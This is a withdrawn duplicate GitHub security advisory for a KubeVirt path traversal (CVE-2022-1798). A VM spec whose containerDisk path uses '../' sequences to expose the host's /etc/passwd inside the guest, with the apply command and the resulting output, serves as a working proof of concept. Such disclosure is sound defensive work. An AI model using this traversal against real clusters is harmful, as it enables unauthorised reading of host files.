Skip to content

Duplicate Advisory: KubeVirt arbitrary host file read from the VM

Moderate severity GitHub Reviewed Published Aug 9, 2022 in google/security-research • Updated Apr 3, 2023
Withdrawn This advisory was withdrawn on Sep 30, 2022

Package

gomod kubevirt.io/kubevirt (Go)

Affected versions

>= 0.20.0, < 0.55.1

Patched versions

0.55.1

Description

Duplicate Advisory

This advisory is a duplicate of GHSA-qv98-3369-g364. This link is maintained to preserve external references.

Original Description

Summary
As part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified. Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.

The read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.

Severity

Moderate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.

Proof of Concept

The initial VMI specifications can be written as such to reproduce the issue:


apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: vmi-fedora
spec:
  domain:
    devices:
      disks:
      - disk:
          bus: virtio
        name: containerdisk
      - disk:
          bus: virtio
        name: cloudinitdisk
      - disk:
          bus: virtio
        name: containerdisk1
      rng: {}
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
    name: containerdisk
  - containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
      path: test3/../../../../../../../../etc/passwd
    name: containerdisk1
  - cloudInitNoCloud:
      userData: |
        #!/bin/sh
        echo 'just something to make cirros happy'
    name: cloudinitdisk


The VMI can then be started through kubectl apply -f vm-test-ncc.yaml.
The requested file is accessible once the VM is up and can be accessed under /dev/vdc.

Depending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure.
Restrictions

SELinux may mitigate this vulnerability.

When using a node with selinux, selinux denies the access and the VM start was aborted:


19s         Warning   SyncFailed                virtualmachineinstance/vmi-fedora    server error. command SyncVMI failed: "preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied"

type=AVC msg=audit(1651828898.296:1266): avc:  denied  { setattr } for  pid=44402 comm="rpc-worker" name="passwd" dev="vda1" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1

After making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:


$ sudo cat /dev/vdc
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...]

Further Analysis
In order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go

Timeline
Date reported: 05/10/2022
Date fixed: N/A
Date disclosed: 08/08/2022

References

@rcorrea35 rcorrea35 published to google/security-research Aug 9, 2022
Published to the GitHub Advisory Database Aug 18, 2022
Reviewed Aug 18, 2022
Published by the National Vulnerability Database Sep 15, 2022
Withdrawn Sep 30, 2022
Last updated Apr 3, 2023

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

EPSS score

0.062%
(28th percentile)

Weaknesses

CVE ID

CVE-2022-1798

GHSA ID

GHSA-cvx8-ppmc-78hm

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.